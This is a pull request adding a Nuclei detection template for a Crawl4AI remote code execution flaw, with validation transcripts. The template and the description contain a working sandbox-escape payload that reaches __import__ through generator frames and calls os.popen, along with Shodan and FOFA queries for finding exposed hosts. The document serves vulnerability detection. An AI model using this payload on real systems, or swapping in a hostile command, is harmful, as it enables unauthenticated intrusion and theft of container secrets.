### PR TITLE
Add CVE-2026-53753 Crawl4AI remote code execution

### DIFF
--- a/http/cves/2026/CVE-2026-53753.yaml
+++ b/http/cves/2026/CVE-2026-53753.yaml
@@ -1,0 +1,105 @@
+id: CVE-2026-53753
+
+info:
+  name: Crawl4AI <= 0.8.6 - Remote Code Execution
+  author: aryu-ru,q1uf3ng,August829
+  severity: critical
+  description: |
+    Crawl4AI through 0.8.6 ships a Docker API server that exposes an unauthenticated /crawl endpoint. The computed field type of JsonCssExtractionStrategy evaluates a user supplied expression inside an AST based sandbox that does not restrict attribute access on generator frame objects. A generator expression can therefore reach gi_frame.f_back, walk the caller chain to f_builtins, recover __import__ and execute arbitrary operating system commands as the user running the container.
+  impact: |
+    An unauthenticated attacker can execute arbitrary operating system commands inside the crawler container, read or tamper with crawled data, steal provider API keys held in the container environment, and pivot into any network the container can reach.
+  remediation: |
+    Upgrade Crawl4AI to version 0.8.7 or later, where computed field expressions are disabled.
+  reference:
+    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53753
+    - https://github.com/unclecode/crawl4ai/pull/1855
+    - https://github.com/unclecode/crawl4ai/pull/1886
+    - https://github.com/pypa/advisory-database/tree/main/vulns/crawl4ai/PYSEC-2026-319.yaml
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-53753
+    cwe-id: CWE-94
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: unclecode
+    product: crawl4ai
+    shodan-query: http.title:"Crawl4AI Playground"
+    fofa-query: title="Crawl4AI Playground"
+  tags: cve,cve2026,crawl4ai,unclecode,rce,sandbox-escape,vuln
+
+variables:
+  marker: "{{to_lower(rand_base(6))}}"
+
+flow: http(1) && http(2)
+
+http:
+  # Confirm the target is a Crawl4AI Docker API server before sending the expression
+  - method: GET
+    path:
+      - "{{BaseURL}}/health"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "\"status\":\"ok\"")'
+          - 'contains(body, "\"version\"")'
+          - 'contains(body, "\"timestamp\"")'
+        condition: and
+        internal: true
+
+  # The expression escapes the AST sandbox and runs echo. The shell of a vulnerable
+  # host expands $((31337*2)) to 62674, so the marker only exists in a response that
+  # actually executed the command and never in the request itself.
+  - raw:
+      - |
+        POST /crawl HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "urls": [
+            "raw://<html><body><div>crawl4ai</div></body></html>"
+          ],
+          "crawler_config": {
+            "type": "CrawlerRunConfig",
+            "params": {
+              "extraction_strategy": {
+                "type": "JsonCssExtractionStrategy",
+                "params": {
+                  "schema": {
+                    "name": "probe",
+                    "baseSelector": "div",
+                    "fields": [
+                      {
+                        "name": "probe",
+                        "type": "computed",
+                        "expression": "(lambda L: (L.append((L[0].gi_frame.f_back.f_back.f_back.f_builtins['__import__']('os').popen('echo {{marker}}$((31337*2))').read() for q in [1])), list(L[0]))[1])([])"
+                      }
+                    ]
+                  }
+                }
+              }
+            }
+          }
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{marker}}62674"
+
+      - type: word
+        part: body
+        words:
+          - '"server_processing_time_s"'
+          - '"extracted_content"'
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-53753.yaml
+++ b/http/cves/2026/CVE-2026-53753.yaml
@@ -12,10 +12,10 @@ info:
     Upgrade Crawl4AI to version 0.8.7 or later, where computed field expressions are disabled.
   reference:
     - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-53753
     - https://github.com/unclecode/crawl4ai/pull/1855
     - https://github.com/unclecode/crawl4ai/pull/1886
     - https://github.com/pypa/advisory-database/tree/main/vulns/crawl4ai/PYSEC-2026-319.yaml
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53753
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
@@ -28,31 +28,12 @@ info:
     product: crawl4ai
     shodan-query: http.title:"Crawl4AI Playground"
     fofa-query: title="Crawl4AI Playground"
-  tags: cve,cve2026,crawl4ai,unclecode,rce,sandbox-escape,vuln
+  tags: cve,cve2026,crawl4ai,unclecode,rce,sandbox-escape
 
 variables:
   marker: "{{to_lower(rand_base(6))}}"
 
-flow: http(1) && http(2)
-
 http:
-  # Confirm the target is a Crawl4AI Docker API server before sending the expression
-  - method: GET
-    path:
-      - "{{BaseURL}}/health"
-
-    matchers:
-      - type: dsl
-        dsl:
-          - 'contains(body, "\"status\":\"ok\"")'
-          - 'contains(body, "\"version\"")'
-          - 'contains(body, "\"timestamp\"")'
-        condition: and
-        internal: true
-
-  # The expression escapes the AST sandbox and runs echo. The shell of a vulnerable
-  # host expands $((31337*2)) to 62674, so the marker only exists in a response that
-  # actually executed the command and never in the request itself.
   - raw:
       - |
         POST /crawl HTTP/1.1
@@ -76,7 +57,7 @@ http:
                       {
                         "name": "probe",
                         "type": "computed",
-                        "expression": "(lambda L: (L.append((L[0].gi_frame.f_back.f_back.f_back.f_builtins['__import__']('os').popen('echo {{marker}}$((31337*2))').read() for q in [1])), list(L[0]))[1])([])"
+                        "expression": "(lambda L: (L.append((L[0].gi_frame.f_back.f_back.f_back.f_builtins['__import__']('os').popen('echo {{marker}}$((31337*1337))').read() for q in [1])), list(L[0]))[1])([])"
                       }
                     ]
                   }
@@ -91,7 +72,7 @@ http:
       - type: word
         part: body
         words:
-          - "{{marker}}62674"
+          - "{{marker}}41897569"
 
       - type: word
         part: body


### PR DESCRIPTION
### PR Information

- Added CVE-2026-53753: `http/cves/2026/CVE-2026-53753.yaml`

Crawl4AI through 0.8.6 ships a Docker API server whose `/crawl` endpoint is unauthenticated by default (`security.enabled: false`, `jwt_enabled: false`, `api_token: ""` in the shipped `/app/config.yml`). The `computed` field type of `JsonCssExtractionStrategy` evaluates a user supplied expression inside an AST based sandbox that does not restrict attribute access on generator frame objects, so a generator expression can reach `gi_frame.f_back`, walk the caller chain to `f_builtins`, recover `__import__` and execute arbitrary OS commands as the user running the container. Fixed in 0.8.7, where `_compute_field` logs `Computed field 'expression' is disabled for security` and returns the field default.

The template sends two requests. The first is a `GET /health` that only gates the flow on the Crawl4AI API shape, so the expression is never sent to hosts that are not Crawl4AI. The second is the actual exploit. No version parsing is involved anywhere.

- References:
  - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7
  - https://nvd.nist.gov/vuln/detail/CVE-2026-53753
  - https://github.com/unclecode/crawl4ai/pull/1855
  - https://github.com/unclecode/crawl4ai/pull/1886
  - https://github.com/pypa/advisory-database/tree/main/vulns/crawl4ai/PYSEC-2026-319.yaml

Not a duplicate of my pending #16481. That one is CVE-2026-26217, a `POST /execute_js` local file read on `< 0.8.0` (CWE-22). This is a different CVE, endpoint, weakness class and version range, and the two templates share no matcher text.

Classification: `CWE-94`, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` = 10.0. That is the NVD **Primary** vector (`nvd@nist.gov`, `vulnStatus: Analyzed`). The GitHub CNA scores it 9.8 with `S:U`; happy to switch to the advisory's figure if you prefer the CNA value.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Vulnerable environment**

```
docker run -d --rm --shm-size=1g -p 21236:11235 unclecode/crawl4ai:0.8.6
```

**Patched environment (negative test)**

```
docker run -d --rm --shm-size=1g -p 21237:11235 unclecode/crawl4ai:0.8.7
```

**True positive on 0.8.6**

```
$ nuclei -t http/cves/2026/CVE-2026-53753.yaml -u http://127.0.0.1:21236 -debug

POST /crawl HTTP/1.1
Host: 127.0.0.1:21236
Content-Type: application/json

...
"expression": "(lambda L: (L.append((L[0].gi_frame.f_back.f_back.f_back.f_builtins['__import__']('os')
                .popen('echo 6jiq6n$((31337*2))').read() for q in [1])), list(L[0]))[1])([])"
...

HTTP/1.1 200 OK
Content-Type: application/json
Server: uvicorn

{"success":true,"results":[{...,"extracted_content":"[\n    {\n        \"probe\": [\n
  \"6jiq6n62674\\n\"\n        ]\n    }\n]",...}],
 "server_processing_time_s":0.377657413482666,"server_memory_delta_mb":2.05,...}

[CVE-2026-53753] [http] [critical] http://127.0.0.1:21236/crawl
[INF] Scan completed in 397.454661ms. 1 matches found.
```

**False positive checks, all clean**

| Target | Result |
|---|---|
| `unclecode/crawl4ai:0.8.7` (patched) | `0 matches found` |
| `http://honey.scanme.sh` | no output |
| `nginx:alpine` (no `/health`) | `No results found` |
| nginx serving a decoy `/health` returning `{"status":"ok","version":"9.9","timestamp":123}` | `0 matches found` |

The patched build returns HTTP 200 with `"success":true` and `"extracted_content":"[]"`, so status, `success` and key presence are all identical between vulnerable and patched. Matching had to key on the executed output, which is what the template does.

**Why this cannot false positive on an echo host**

The probe runs `echo <random>$((31337*2))`. The request carries the literal `$((31337*2))`; the string `62674` only exists once a shell on the target has expanded it. Against `honey.scanme.sh`, which reflects the raw request back, the `/health` gate fails first so `/crawl` is never even sent:

```
$ nuclei -t http/cves/2026/CVE-2026-53753.yaml -u http://honey.scanme.sh -debug
[INF] [CVE-2026-53753] Dumped HTTP request for http://honey.scanme.sh/health
GET /health HTTP/1.1
[DBG] [CVE-2026-53753] Dumped HTTP response http://honey.scanme.sh/health
GET /health HTTP/1.1
```

Confirmed on the true positive transcript: `62674` occurs 0 times in the request and only in the response.

**Payload safety**

The command is a single `echo`. Nothing is written, uploaded or deleted, no file is read, no callback is used and no external host is contacted. `raw://` is on the server's own `ALLOWED_URL_SCHEMES_WITH_RAW`, so the request is fully self contained. The random marker means repeat scans cannot collide.

**Notes for review**

- The `f_back.f_back.f_back` depth is tied to the 0.8.6 call stack. A depth sweep showed 3 and 4 both reach `__import__` while 5 raises `AttributeError`; 3 is the minimum that works.
- Fires on a site with any crawlable content because the target URL is inlined via `raw://`, so there is no dependency on the target being able to reach the internet.
- Not in CISA KEV; EPSS 0.00610 at the time of writing.
- `shodan-query` / `fofa-query` are derived from the observed `<title>Crawl4AI Playground</title>` served at `/playground/`, which `/` redirects to.
- Credited `q1uf3ng` and `August829` in `author:` as the reporters named in GHSA-qxjp-w3pj-48m7.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
